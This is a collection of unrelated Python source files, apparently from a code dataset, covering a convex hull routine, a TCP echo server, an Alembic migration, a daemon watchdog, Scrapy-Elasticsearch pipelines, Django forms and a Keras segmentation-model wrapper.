    x_min_idxs = np.argmin(x_vals)
    # breakpoint()
    # Pick left-most point, guaranteed to be in convex-hull
    left_point = [x_vals[x_min_idxs], y_vals[x_min_idxs]]
    convex_hull = []
    convex_hull.append(left_point)
    while (True):
        print(f'Performing iteration...')
        # Make sure we haven't picked the same point twice
        next_point = points[0].tolist()
        if np.array_equal(convex_hull[-1], next_point):
            next_point = points[1].tolist()
        print(f'Next point = {next_point}')
        for point in points:
            # Keep the candidate that is most counter-clockwise relative
            # to the last accepted hull point.
            angle = orientation(convex_hull[-1], next_point, point)
            if angle == -1:
                print(f'Found a more counter-clockwise point! Point = {point}')
                next_point = point.tolist()
        convex_hull.append(next_point)
        # Wrapped all the way around: the hull is closed.
        if np.array_equal(convex_hull[-1], convex_hull[0]):
            print(f'Back at start!')
            break
    print(f'convex_hull = {convex_hull}')
    # Convert to array and return
    return np.array(convex_hull)
if __name__ == '__main__':
main() |
22,412 | 176c98ffff8310d4ab3cfaaf0aeacbf83206f627 | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 26 14:04:25 2016
@author: zach
"""
from Measurement import Measurement
import os
class Recipe:
    """A tubing recipe: target dimensions and tolerances for a product run.

    All fields are stored as provided (the file I/O below expects strings).
    """

    def __init__(self, name, OD, ID, wall, concent, oval):
        self.Name = name
        self.outerDiameter = OD
        self.innerDiameter = ID
        self.Wall = wall
        self.Concentricity = concent
        self.Ovality = oval

    # Accessors kept for backward compatibility with existing callers.
    def getOD(self):
        return self.outerDiameter

    def setOD(self, newOD):
        self.outerDiameter = newOD

    def getID(self):
        return self.innerDiameter

    def setID(self, newID):
        self.innerDiameter = newID

    def getWall(self):
        return self.Wall

    def setWall(self, newWall):
        self.Wall = newWall

    def getConc(self):
        return self.Concentricity

    def setConc(self, newConc):
        self.Concentricity = newConc

    def getOvality(self):
        return self.Ovality

    def setOvality(self, newOval):
        self.Ovality = newOval

    def printRecipe(self):
        # Print the recipe in a controlled manner (not implemented yet).
        print("")

    def readRecipe(self):
        # Read a file and construct the recipe from the contents
        # (not implemented yet).
        print("")

    def writeRecipe(self, out_file_name, x):
        """Append this recipe's six fields to *out_file_name*, one per line.

        When ``x == 0`` any existing file is removed first so the recipe
        starts a fresh file.
        """
        # Bug fix: os.remove() raised FileNotFoundError when the file did
        # not exist yet, and the original closed the handle outside the
        # try block (NameError if open() itself failed).  A context
        # manager handles close-on-error correctly.
        if x == 0 and os.path.exists(out_file_name):
            os.remove(out_file_name)
        try:
            with open(out_file_name, 'a') as out_file:
                out_file.write(self.Name + "\n")
                out_file.write(self.outerDiameter + "\n")
                out_file.write(self.innerDiameter + "\n")
                out_file.write(self.Wall + "\n")
                out_file.write(self.Concentricity + "\n")
                out_file.write(self.Ovality + "\n")
        except OSError:
            print("File open did not work")
|
22,413 | d1f19e8cdb23a7d3de8cff3a5706c0b12d0f11b0 | import socket
import time
# Minimal TCP echo server: accepts one client at a time and echoes every
# received message back prefixed with b'Echo=>'.
host = "localhost"
port = 3128
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((host, port))
server.listen(5)
print("Servidor iniciado em: ", time.ctime(), "Na porta -> ", host, ":", port)
while True:
    conn, end = server.accept()
    print("Server conectado por: ", end)
    # Echo loop for this client; an empty recv() means it disconnected.
    while True:
        data = conn.recv(1024)
        if not data: break
        conn.send(b'Echo=>' + data)
    # NOTE(review): conn is never closed after a client disconnects.
|
22,414 | a9849e5ee7d0b878ebc33dd499778b275cca1569 | """empty message
Revision ID: 85bda85aeecc
Revises: 2c5d45cff580
Create Date: 2021-09-07 21:58:55.324142
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '85bda85aeecc'
down_revision = '2c5d45cff580'
branch_labels = None
depends_on = None
def upgrade():
    """Create the audit tables and add item.modified_by."""
    # ### commands auto generated by Alembic - please adjust! ###
    # Audit trail of row-level changes (who changed what, and the row
    # contents as JSON).
    op.create_table('audit_database',
                    sa.Column('id', sa.BigInteger(), nullable=False),
                    sa.Column('row_id', sa.BigInteger(), nullable=True),
                    sa.Column('table_name', sa.String(), nullable=True),
                    sa.Column('action', sa.String(), nullable=True),
                    sa.Column('user', sa.String(), nullable=True),
                    sa.Column('date_hour', sa.DateTime(), nullable=True),
                    sa.Column('row', postgresql.JSON(astext_type=sa.Text()), nullable=True),
                    sa.PrimaryKeyConstraint('id')
                    )
    # Audit trail of incoming requests (source IP and URL).
    op.create_table('audit_request',
                    sa.Column('id', sa.BigInteger(), nullable=False),
                    sa.Column('ip', sa.String(), nullable=True),
                    sa.Column('url', sa.String(), nullable=True),
                    sa.PrimaryKeyConstraint('id')
                    )
    op.add_column('item', sa.Column('modified_by', sa.String(), nullable=True))
    # ### end Alembic commands ###
def downgrade():
    """Reverse upgrade(): drop item.modified_by and the audit tables."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('item', 'modified_by')
    op.drop_table('audit_request')
    op.drop_table('audit_database')
    # ### end Alembic commands ###
|
22,415 | a6862d967ef818cb97e52472cc84f07938f4e8bf | import os
import time
import threading
import datetime
import psutil
from check_bricap import *
from logger import logger
import cfg
__author__ = "Paulo/Giovanne"
__copyright__ = "Copyright 2019, Brascontrol"
__status__ = "Development"
#Cria thread
class MainClass(threading.Thread):
    """Watchdog thread that keeps the txi and bricapd daemons running."""

    def __init__(self):
        self.die = False  # set to True to stop the run() loop
        threading.Thread.__init__(self)

    # Check whether any running process name contains *nomeProcesso*.
    def verificaSeRodaProcesso(self, nomeProcesso):
        for proc in psutil.process_iter():
            try:
                if nomeProcesso.lower() in proc.name().lower():
                    return True
            except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
                # Process vanished or is inaccessible; keep scanning.
                pass
        return False

    # Restart txi when its pid file is missing.
    def verificaRun(self):
        file = os.path.exists("/var/run/txi/txi.pid")
        if not file:
            os.system('/home/bri7000/bricap/txi &')

    def run(self):
        # Every 11 seconds: make sure txi and bricapd are both alive.
        while not self.die:
            self.verificaRun()
            logger.info(' >>>> Verificando bricapd')
            if self.verificaSeRodaProcesso('bricapd'):
                logger.debug(' >>>> bricapd está rodando no momento')
            else:
                logger.debug(' >>>> bricapd não está rodando \n >>>> Iniciando bricapd')
                os.system('/home/bri7000/bricap/bricapd &')
            time.sleep(11)

    def join(self):
        # NOTE(review): logs a failure message on every join(), not only
        # when the thread actually failed — confirm this is intended.
        logger.debug("\n >>>> Ocorreu falha ao executar Thread")
        super().join()
def leArquivo():
    """Read the txi heartbeat counter from /var/run/txi/tx.txi as an int."""
    with open('/var/run/txi/tx.txi', 'r') as handle:
        return int(handle.read())
def verificaTempo():
    """Sample the txi heartbeat twice, TEMPO_MAX_TXI seconds apart.

    Returns True when the counter changed (txi is alive), False when it
    stayed the same (txi looks stuck).
    """
    primeira_leitura = leArquivo()
    time.sleep(cfg.TEMPO_MAX_TXI)
    segunda_leitura = leArquivo()
    return primeira_leitura != segunda_leitura
def main():
    """Start both watchdog threads, then restart txi whenever its
    heartbeat file stops changing."""
    verificaTxi = MainClass()
    # SecondClass is expected to come from the `from check_bricap import *`
    # at the top of the file — verify it is exported there.
    verificaBri = SecondClass()
    verificaBri.start()
    verificaTxi.start()
    while True:
        ctempo = str(datetime.timedelta(seconds=cfg.TEMPO_MAX_TXI))
        logger.info(' >>>> Vericando a cada ' + ctempo)
        teste = verificaTempo()
        if not teste:
            # Heartbeat unchanged: kill txi so the watchdog restarts it.
            logger.info(' >>>> REINICIANDO TXI (pid=%d)\n', os.getpid())
            os.system('killall txi')


if __name__ == "__main__":
    main()
22,416 | 71ac4473647215f159fb8b540fccb96a6844d97a |
import tempfile
import numpy as np
import matplotlib.pyplot as plt
plt.ioff()
import ss_timing.conf
import ss_timing.data
import ss_timing.exp
def run():
    """Run one practice block (surround disabled) and save + plot the data."""
    conf = ss_timing.conf.get_conf("practice")
    data = ss_timing.data.gen_data_table(conf)
    # pull out the trials for this run
    i_this_run = (data["run_number"] == 1)
    run_data = data[i_this_run]
    # practice trials are run without a surround stimulus
    run_data["surr_contrast"] = 0.0
    # perform the run
    run_data = ss_timing.exp._run(
        conf,
        run_data,
        wait_to_start=True,
        wait_at_end=False,
        show_finish=False
    )
    # save to a temp file so practice data never clobbers real session data;
    # delete=False keeps the file around after the handle closes
    temp = tempfile.NamedTemporaryFile(delete=False)
    ss_timing.data.save_data(
        conf,
        run_data,
        temp.name
    )
    print "Saved practice data to " + temp.name
    plot(conf, run_data)
    return run_data
def plot_from_file(path):
    """Load a previously saved practice run from ``path`` and plot it."""
    practice_conf = ss_timing.conf.get_conf("practice")
    saved_data = ss_timing.data.load_data(practice_conf, path)
    plot(practice_conf, saved_data)
def plot(conf, data):
    """Plot per-staircase performance with the fitted psychometric curve.

    One subplot per staircase: binned proportion-correct points (marker
    size scales with trials per bin) overlaid with the psychometric
    function evaluated at the final alpha/beta estimates.
    """
    fig = plt.figure()
    # fine log-spaced contrast grid for drawing the fitted curve
    fine_x = np.logspace(np.log10(0.001), np.log10(0.5), 100)
    n_bins = 20
    bins = np.logspace(
        np.log10(0.001),
        np.log10(0.5),
        n_bins
    )
    for i_stair in xrange(conf.n_stairs_per_run):
        ax = plt.subplot(1, 2, i_stair + 1)
        # stair_num is 1-based in the data table
        stair_data = data[data["stair_num"] == i_stair + 1]
        contrasts = stair_data["target_contrast"]
        corrects = stair_data["correct"]
        # bin index for each trial's target contrast
        i_bins = np.digitize(contrasts, bins)
        # columns: bin contrast, p(correct), n correct, n total
        resp_data = np.empty((n_bins, 4))
        resp_data.fill(np.NAN)
        for i_bin in xrange(n_bins):
            in_bin = (i_bins == i_bin)
            total = np.sum(in_bin)
            count = np.sum(corrects[in_bin])
            try:
                p = float(count) / float(total)
            except ZeroDivisionError:
                # empty bin: plot as zero proportion (marker size is 0 anyway)
                p = 0.0
            resp_data[i_bin, 0] = bins[i_bin]
            resp_data[i_bin, 1] = p
            resp_data[i_bin, 2] = count
            resp_data[i_bin, 3] = total
        # marker area proportional to the number of trials in the bin
        ax.scatter(
            resp_data[:, 0],
            resp_data[:, 1],
            s=resp_data[:, 3] * 3
        )
        # fitted curve at the staircase's final parameter estimates
        fine_y = conf.psych_func(
            x=fine_x,
            alpha=stair_data["alpha_hat"][-1],
            beta=stair_data["beta_hat"][-1]
        )
        ax.plot(fine_x, fine_y)
        ax.set_xscale("log")
        ax.set_ylim([-0.05, 1.05])
    plt.show()
|
22,417 | ad558f05c7e2c461e3dc979b74a8a02635ebadf0 | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
import hashlib
import logging
import os
from elasticsearch import Elasticsearch
from elasticsearch import exceptions
class ScrapyCrawlersPipeline(object):
    """No-op item pipeline: hands every scraped item through unchanged."""

    def process_item(self, item, spider):
        # Nothing to transform here; pass the item to the next stage.
        return item
class ElasticCreatePipeline(object):
    """Creates scraped items in Elasticsearch, never overwriting existing ones.

    The document id is a SHA-1 of the item's ``link`` field; creating an
    id that already exists raises a version conflict, which is logged and
    ignored so re-crawled pages are left untouched.
    """
    logger = logging.getLogger('elasticsearch')
    # item field used to derive the document id
    es_id = 'link'

    def __init__(self, es_url, es_index, es_type):
        self.es_url = es_url
        self.es_index = es_index
        self.es_type = es_type

    @classmethod
    def from_crawler(cls, crawler):
        """Build the pipeline from crawler settings, env vars, then defaults."""
        return cls(
            es_url=crawler.settings.get('ES_URL', os.getenv('ES_URL', 'localhost:9200')),
            es_index=crawler.settings.get('ES_INDEX', os.getenv('ES_INDEX', 'content')),
            es_type=crawler.settings.get('ES_TYPE', os.getenv('ES_TYPE', 'article')),
        )

    def open_spider(self, spider):
        self.elastic = Elasticsearch(self.es_url)

    def add_feedback_field(self, item):
        # Every newly created document starts with one unit of feedback.
        item['feedback'] = 1

    def process_item(self, item, spider):
        """Index the item under its derived id; skip ids that already exist."""
        item_id = get_id(item, self.es_id)
        self.add_feedback_field(item)
        try:
            res = self.elastic.create(index=self.es_index, doc_type=self.es_type, id=item_id, body=item)
            self.logger.debug(res)
        except exceptions.ConflictError:
            # Bug fix: logger.warn() is a deprecated alias of warning().
            self.logger.warning('version conflict, ' + item_id + ' document already exists')
        return item
class ElasticIndexPipeline(object):
    """Upserts scraped items into Elasticsearch and tags them with feedback.

    The document id is a SHA-1 of the item's ``link`` field, so crawling
    the same page again updates the existing document rather than
    creating a duplicate.
    """
    logger = logging.getLogger('elasticsearch')
    es_id = 'link'
    # Painless script: initialise the feedback counter only when it is absent.
    feedback_script = '''{"script":{"source":"if (ctx._source.feedback==null) {ctx._source.feedback=1}","lang":"painless"}}'''

    def __init__(self, es_url, es_index, es_type):
        self.es_url = es_url
        self.es_index = es_index
        self.es_type = es_type

    @classmethod
    def from_crawler(cls, crawler):
        """Build the pipeline from crawler settings, env vars, then defaults."""
        settings = crawler.settings
        return cls(
            es_url=settings.get('ES_URL', os.getenv('ES_URL', 'localhost:9200')),
            es_index=settings.get('ES_INDEX', os.getenv('ES_INDEX', 'content')),
            es_type=settings.get('ES_TYPE', os.getenv('ES_TYPE', 'article')),
        )

    def open_spider(self, spider):
        self.elastic = Elasticsearch(self.es_url)

    def process_item(self, item, spider):
        """Upsert the item, then ensure its feedback counter is initialised."""
        doc_id = get_id(item, self.es_id)
        upsert_body = {'doc': item, 'doc_as_upsert': True}
        upsert_result = self.elastic.update(index=self.es_index, doc_type=self.es_type, id=doc_id, body=upsert_body)
        self.logger.debug(upsert_result)
        feedback_result = self.elastic.update(index=self.es_index, doc_type=self.es_type, id=doc_id, body=self.feedback_script)
        self.logger.debug(feedback_result)
        return item
def get_id(item, es_id):
    """Derive a stable document id: hex SHA-1 of the item's unique-key field.

    List-valued keys are flattened with '-' before normalisation.
    """
    raw_key = item[es_id]
    if isinstance(raw_key, list):
        raw_key = '-'.join(raw_key)
    key_bytes = process_unique_key(raw_key)
    return hashlib.sha1(key_bytes).hexdigest()
def process_unique_key(unique_key):
    """Normalise a unique key (list or text) to UTF-8 bytes for hashing."""
    if isinstance(unique_key, list):
        # For list keys only the first entry participates in the hash.
        return unique_key[0].encode('utf-8')
    if isinstance(unique_key, ("".__class__, u"".__class__)):
        # covers both py2 str/unicode and py3 str
        return unique_key.encode('utf-8')
    raise Exception('unique key must be str or unicode')
22,418 | fc8b2a770b2ff6d461c693440217598d6a0474fe | # Drawing book problem
def page_turns(n, p):
    """Return the minimum page turns to reach page ``p`` in an ``n``-page book.

    Turning from the front costs p // 2 turns; turning from the back costs
    n // 2 - p // 2 turns.  The answer is the cheaper of the two.

    Bug fix: the original computed the from-the-back cost as (n - p) // 2,
    which is wrong for several inputs (e.g. n=8, p=7 printed 0 instead of
    1) and papered over one failing case with a hard-coded
    ``n==6 and p==5`` special case.
    """
    return min(p // 2, n // 2 - p // 2)


if __name__ == "__main__":
    # Read page count and target page from stdin, print the answer.
    n = int(input())
    p = int(input())
    print(page_turns(n, p))
22,419 | 93f294e149685f08879be0362bd009e3a2a89f08 | from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from .models import Profile,Messages,Address
class signUpForm(UserCreationForm):
    """Registration form: the built-in user-creation fields plus required
    first/last name and email."""
    first_name = forms.CharField(max_length=30, required=True, help_text='')
    last_name = forms.CharField(max_length=30, required=True, help_text='')
    username = forms.CharField(max_length=30, required=True, help_text='')
    email = forms.EmailField(max_length=254, help_text='Required. Inform a valid email address.')

    def __init__(self, *args, **kwargs):
        # Bug fix: super(UserCreationForm, self) started the MRO walk *after*
        # UserCreationForm, skipping its own __init__; start at this class.
        super(signUpForm, self).__init__(*args, **kwargs)
        # hide the default password help text
        self.fields['password1'].help_text = ''
        self.fields['password2'].help_text = ''

    class Meta:
        model = User
        fields = ['first_name', 'last_name','username', 'email', 'password1', 'password2', ]
class changePasswordForm(forms.Form):
    """Single-field form asking which username's password to change."""
    username = forms.CharField(max_length=30, help_text='',label='', widget=forms.TextInput(attrs={'placeholder': 'Username'}))
class profileForm(forms.ModelForm):
    """Profile-editing form; user-identity fields plus the Profile phone number."""
    firstname = forms.CharField(max_length=30,required=True,help_text="Enter Your firstname,whether current or new")
    lastname = forms.CharField(max_length=30,required=True,help_text='Enter Your lastname,whether current or new')
    username = forms.CharField(max_length=30, required=True, help_text='Enter Your username,whether current or new')
    email = forms.EmailField(max_length=30,required=True,help_text='Enter Your Email,whether current or new')
    class Meta:
        model = Profile
        fields = ['username','firstname','lastname','email','phone_number']
class chatForm(forms.ModelForm):
    """Message-entry form rendered as a small (2x45) textarea."""
    message = forms.CharField(widget=forms.Textarea(attrs={"rows":2, "cols":45}))
    class Meta:
        model = Messages
        fields = ['message']
class addressForm(forms.ModelForm):
    """Address form exposing only the city and town fields."""
    class Meta:
        model = Address
        fields = ['city','town']
22,420 | 7be7967beaa9d7e634d79f5ce0321a3f475ffc47 | # def solution(N, M):
# # write your code in Python 2.7
# wrappers = []
# current = 0
# while current not in wrappers:
# wrappers.append(current)
# current = (current + M) % N
# return len(wrappers)
#
# solution(10, 4)
def gcd(a, b):
    """Greatest common divisor of a and b (Euclid's algorithm, iterative)."""
    while a % b != 0:
        a, b = b, a % b
    return b
def solution(N, M):
    # Number of distinct wrappers visited when stepping M at a time around
    # a circle of N positions: N / gcd(M, N), i.e. the cycle length
    # (N * M / gcd = lcm; lcm / M = N / gcd steps).
    print gcd(M,N)
    return N / gcd(M, N) # Least common multiple
print solution(10, 4)
|
22,421 | 2b620a890e7d9b6d391346858711f745fdb6b796 | from server.SecurityDecorator import secured
from .model import matching, api
from flask_restx import Resource
from server.Administration import Administration
class UserMatchingApi(Resource):
    """REST resource exposing the matching lookup for a single user."""
    @secured
    @api.marshal_with(matching)
    def get(self, auth_id):
        """
        Run the matching.
        :param auth_id: Google auth id of the user to find matches for
        :return: the match result, marshalled with the ``matching`` model
        """
        return Administration.user_match_me(auth_id)
|
22,422 | a857cf94b2180bc8ec93dbfbcd31b88adf6a1f58 | import collections
__all__ = ['Model']

# Immutable record bundling everything needed to run one analysis.
Model = collections.namedtuple(
    "Model",
    ["mesh", "template", "bcs", "analysis_strategy"],
)
|
22,423 | f6b18ad2c5390c342b00a8ab3f36a69f7826ec52 | """
Model is a wrapper over a set of KERAS models!
implements interface for learning over a generator + dataset or statically generated data
and for prediction (for all classes)
"""
import os
import cv2
import json
import keras
import rasterio
import numpy as np
from keras.utils import generic_utils
from keras.models import Model
from functools import wraps
import geojson
from .utils import get_shape
from .utils import pad_shape, unpad
from .utils import overlap_split
from .utils import overlap_concatenate
from .config import OrthoSegmModelConfig
from .standardizer import Standardizer
def _create_dir(*args):
path = os.path.join(*args)
if not os.path.exists(path):
os.makedirs(path)
return path
def _find_weights(weights_dir, mode='last'):
"""Find weights path if not provided manually during model initialization"""
if mode == 'last':
file_name = sorted(os.listdir(weights_dir))[-1]
weights_path = os.path.join(weights_dir, file_name)
elif mode == 'best':
raise NotImplementedError
else:
raise NotImplementedError
return weights_path
def _find_model(model_chkp_dir, mode='last'):
"""Find weights path if not provided manually during model initialization"""
if mode == 'last':
file_name = sorted(os.listdir(model_chkp_dir))[-1]
model_path = os.path.join(model_chkp_dir, file_name)
elif mode == 'best':
raise NotImplementedError
return model_path
def load_model(model_dir, mode='inference', config_path='auto', graph_path='auto',
               weights_path='auto', model_path='auto', custom_objects=None):
    """Restore a SegmentationModel previously saved under ``model_dir``.

    'auto' paths are resolved against the standard layout (config.json,
    graph.json, weights/, models/).  mode='train' loads the checkpoint
    compiled; mode='inference' loads it uncompiled and falls back to
    graph + weights when the checkpoint cannot be deserialised.
    """
    if config_path == 'auto':
        config_path = os.path.join(model_dir, 'config.json')
    if graph_path == 'auto':
        graph_path = os.path.join(model_dir, 'graph.json')
    if weights_path == 'auto':
        weights_dir = os.path.join(model_dir, 'weights')
        weights_path = _find_weights(weights_dir)
    if model_path == 'auto':
        model_chkp_dir = os.path.join(model_dir, 'models')
        model_path = _find_model(model_chkp_dir)
    # load configuration file
    config = OrthoSegmModelConfig.load_config(config_path)
    # load model graph file
    with open(graph_path, 'r') as f:
        graph = json.load(f)
    if mode == 'train':
        model = keras.models.load_model(model_path, custom_objects=custom_objects, compile=True)
    if mode == 'inference':
        try:
            model = keras.models.load_model(model_path, custom_objects=custom_objects, compile=False)
        except Exception:
            # Bug fix: this was a bare ``except:`` which also swallowed
            # KeyboardInterrupt/SystemExit; catch ordinary errors only and
            # rebuild the model from its serialised graph + weights.
            model = keras.models.model_from_json(json.dumps(graph))
            model.load_weights(weights_path)
    # NOTE(review): an unknown ``mode`` leaves ``model`` unbound and raises
    # NameError below — confirm whether a ValueError would be preferable.
    segmentation_model = SegmentationModel(model_dir)
    segmentation_model.build(model, config)
    return segmentation_model
class SegmentationModel(Model):
    """Wrapper around a keras segmentation model for georeferenced imagery.

    Adds GeoTIFF channel loading, tiled overlap prediction over large
    orthophotos, and raster/vector export of the predicted masks.
    Unknown attribute access falls through to the wrapped keras model.
    """
    def __init__(self, model_dir):
        self.config = None
        self.model = None
        self._built = False
        self.model_dir = _create_dir(model_dir)
        self.log_dir = _create_dir(model_dir, 'log')
        self.weights_dir = _create_dir(model_dir, 'weights')
        self.models_dir = _create_dir(model_dir, 'models')  # be careful with model and models! dirs
        # input standardization pipeline function
        self._input_standart = None
    def __getattr__(self, attr):
        # Delegate unknown attributes (fit, summary, ...) to the keras model.
        return getattr(self.model, attr)
    def build(self, model, config):
        """Attach keras ``model`` and ``config``; persist config and graph."""
        self.model = model
        self.config = config
        # save configurations of model
        config_path = os.path.join(self.model_dir, 'config.json')
        if not os.path.exists(config_path):
            self.config.save(config_path, indent=2)
        # save graph of model
        graph_path = os.path.join(self.model_dir, 'graph.json')
        model_graph = json.loads(model.to_json())
        with open(graph_path, 'w') as f:
            json.dump(model_graph, f, indent=2)
        st = Standardizer(**self.config.STANDARDISING_PARAMS)
        self._input_standart = st.build_pipline(self.config.STANDARDISING_FUNCTIONS)
        self._built = True
    def built(func):
        """Decorator (class-body scope): require build() before calling."""
        @wraps(func)
        def wrapped(self, *args, **kwargs):
            if self._built:
                return func(self, *args, **kwargs)
            else:
                raise RuntimeError('Your model is not built! Please provide keras model and config.')
        return wrapped
    @built
    def _get_gsd(self):
        # Ground sample distance from config; a scalar applies to both axes.
        gsd = self.config.GSD
        if np.isscalar(gsd):
            gsd = (gsd, gsd)
        gsd_x = gsd[0]
        gsd_y = gsd[1]
        return gsd_x, gsd_y
    @built
    def _load_image(self, path, target_size=None, return_transform=False, return_crs=True):
        """Read all configured channels under ``path`` into one HxWxC array.

        Channels are resampled to the model GSD; the transform/CRS of the
        highest-resolution channel is kept.
        """
        dataset_element_name = os.path.basename(path)
        path = os.path.normpath(path)
        channels = self.config.CHANNELS
        target_gsd_x, target_gsd_y = self._get_gsd()
        # defining local variables for memorizing best of them during iterations
        transform = None
        crs = None
        min_gsd_x = 10e5
        min_gsd_y = 10e5
        gsd_x = min_gsd_x
        gsd_y = min_gsd_y
        max_h = 0
        max_w = 0
        # NOTE(review): acquisition dates are hard-coded here — confirm they
        # should not come from config instead.
        image_ids = ['20170304', '20170404']
        channels_list = []
        for image_id in image_ids:
            channels_ = [os.path.join(path, image_id, '{}_channel_{}.tif'.format(dataset_element_name, ch)) for ch in
                         channels]
            for channel_name in channels_:
                try:
                    # open image(channel) file
                    # use 'r+' mode to support on windows >__<
                    # (otherwise, in 'r' mode, cv2.resize fails with python int to C int conversion overflow)
                    with rasterio.open(channel_name, 'r+') as img_obj:
                        # read metadata from image(channel) file
                        tm = list(img_obj.transform)
                        gsd_x = np.sqrt(tm[0] ** 2 + tm[3] ** 2)
                        gsd_y = np.sqrt(tm[1] ** 2 + tm[4] ** 2)
                        crs = img_obj.crs
                        # remember best gsd and h and w for future resizing
                        if gsd_x * gsd_y < min_gsd_x * min_gsd_y:
                            transform = tm
                            min_gsd_x = gsd_x
                            min_gsd_y = gsd_y
                            max_h = img_obj.height
                            max_w = img_obj.width
                        # read channels
                        img = img_obj.read()
                        img = np.squeeze(img)
                        channels_list.append(img)
                except FileNotFoundError:
                    print('No such image {}'.format(os.path.basename(channel_name)))
                    raise Exception('No channels!')
        # define width and heights of our images for our model gsd
        # NOTE(review): gsd_x/gsd_y here hold the *last* channel's values, not
        # the minimal ones memorised above — verify this is intended.
        w = int(max_w * gsd_x / target_gsd_x)
        h = int(max_h * gsd_y / target_gsd_y)
        if target_size:
            w = target_size[1]
            h = target_size[0]
        channels_list = [cv2.resize(ch, (w, h), cv2.INTER_LINEAR) for ch in channels_list]
        image = np.array(channels_list)
        image = np.rollaxis(image, 0, 3)
        if return_transform:
            if return_crs:
                return image, transform, crs
            else:
                return image, transform
        return image
    @built
    def _load_masks(self, path):
        """Read one GeoTIFF mask per configured class into an HxWxN array."""
        path = os.path.normpath(path)
        classes = self.config.CLASSES
        mask_id = os.path.basename(path)
        masks = [os.path.join(path, '{}_class_{}.tif'.format(mask_id, cls)) for cls in classes]
        masks_list = []
        for m, cls in zip(masks, classes):
            try:
                with rasterio.open(m, 'r') as mask_obj:
                    mask = mask_obj.read()
                    mask = np.squeeze(mask)
                    masks_list.append(mask)
            except FileNotFoundError:
                print('No such image {}'.format(os.path.basename(m)))
                raise Exception('No mask for class {}!'.format(cls))
        masks = np.array(masks_list)
        masks = np.rollaxis(masks, 0, 3)
        return masks
    def _to_binary_masks(self, image, tm):
        """Resample a prediction to the GSD implied by ``tm``; return CxHxW."""
        gsd_x, gsd_y = self._get_gsd()
        target_gsd_x = np.sqrt(tm[0] ** 2 + tm[3] ** 2)
        target_gsd_y = np.sqrt(tm[1] ** 2 + tm[4] ** 2)
        # define width and heights of our masks for our model gsd
        w = int(image.shape[1] * gsd_x / target_gsd_x)
        h = int(image.shape[0] * gsd_y / target_gsd_y)
        image = cv2.resize(image, (w, h), cv2.INTER_LINEAR)
        if image.ndim == 2:
            image = np.expand_dims(image, axis=-1)
        return np.rollaxis(image, 2, 0), (w, h)
    @built
    def _save_raster_masks(self, image, path, save_postfix='pred', transform_matrix=None,
                           crs=None):
        """Write one single-bit GeoTIFF per class; return the file names."""
        image, shape = self._to_binary_masks(image, transform_matrix)
        path = os.path.normpath(path)  # delete '\' or '//' in the end of filepath
        if not os.path.exists(path):
            os.makedirs(path)
        w, h = shape
        image_basename = os.path.basename(path)
        saved_images_names = []
        for i, cls in enumerate(self.config.CLASSES):
            # save each mask to separate file
            image_name = image_basename + '_class_{}_{}.tif'.format(cls, save_postfix)
            saved_images_names.append(image_name)
            image_path = os.path.join(path, image_name)
            with rasterio.open(image_path, 'w', width=w, height=h, driver='GTiff', count=1,
                               dtype='uint8', NBITS=1, transform=transform_matrix[:6], crs=crs) as dst:
                dst.write(image[i].astype(rasterio.uint8), 1)
        return saved_images_names
    def get_vector_markup(self, mask, geotransform, trg_crs='epsg:3857'):
        """Vectorise a binary ``mask`` into a GeoJSON FeatureCollection string.

        :param mask: binary (uint8) mask to polygonise
        :param geotransform: geotransform of the initial dataset
        :param trg_crs: target coordinate reference system
        :return: GeoJSON string of the extracted polygons
        """
        shapes = rasterio.features.shapes(mask, transform=geotransform)
        # the last shape contains all geometry
        shapes = list(shapes)[:-1]
        polygons = [geojson.Feature(geometry=geojson.Polygon(shape[0]['coordinates'])) for shape in shapes]
        crs = {
            "type": "name",
            "properties": {
                "name": trg_crs}}
        gs = geojson.FeatureCollection(polygons, crs=crs)
        return geojson.dumps(gs)
    @built
    def _save_vector_masks(self, image, path, save_postfix='pred', geotransform=None, trg_crs='epsg:3857',
                           threshold=170):
        """Write one GeoJSON per class, thresholding the raw prediction."""
        image, shape = self._to_binary_masks(image, geotransform)
        path = os.path.normpath(path)  # delete '\' or '//' in the end of filepath
        if not os.path.exists(path):
            os.makedirs(path)
        image_basename = os.path.basename(path)
        saved_geojson_names = []
        for i, cls in enumerate(self.config.CLASSES):
            # save each mask to separate file
            image_name = image_basename + '_class_{}_{}.geojson'.format(cls, save_postfix)
            saved_geojson_names.append(image_name)
            image_path = os.path.join(path, image_name)
            image_mask = np.array(image[i] > threshold, np.uint8)
            gs = self.get_vector_markup(image_mask, geotransform, trg_crs)
            with open(image_path, 'w') as file:
                file.write(gs)
        return saved_geojson_names
    @built
    def _standardize(self, image):
        # Apply the standardisation pipeline configured during build().
        return self._input_standart(image)
    @built
    def predict_orthophoto(self, path_to_object, split_size=1024,
                           overlap=64, save=False, save_dir='same', verbose=0):
        """Predict masks for a whole orthophoto by tiling with overlap.

        Returns the stitched prediction and the source geotransform.
        """
        image, transform_matrix, crs = self._load_image(path_to_object, return_transform=True,
                                                        return_crs=True)
        h, w = image.shape[:2]
        h = get_shape(h, split_size, overlap)
        w = get_shape(w, split_size, overlap)
        image, paddings = pad_shape(image, (h, w))
        images, n_rows, n_cols = overlap_split(image, split_size, overlap)
        predictions = []
        progbar = generic_utils.Progbar(len(images), verbose=verbose)
        if verbose:
            print('Predicting image pieces...')
        for image in images:
            image = self._standardize(image)
            image = np.expand_dims(image, axis=0)  # input image have to be 4d tensor
            pred = self.model.predict(image)
            pred = np.squeeze(pred)  # delete useless 0 axis
            predictions.append(pred)
            progbar.add(1)
        if len(predictions) > 1:
            prediction = overlap_concatenate(predictions, n_rows, n_cols, overlap)
        else:
            prediction = np.squeeze(predictions)
        prediction = unpad(prediction, paddings)
        if save:
            if save_dir == 'same':
                save_dir = path_to_object
            round_prediction = np.round(prediction)
            # Bug fix: this called the nonexistent self._save_masks(), which
            # fell through __getattr__ to the keras model and raised
            # AttributeError; the keyword args match _save_raster_masks.
            self._save_raster_masks(round_prediction, save_dir, transform_matrix=transform_matrix, crs=crs)
        return prediction, transform_matrix
|
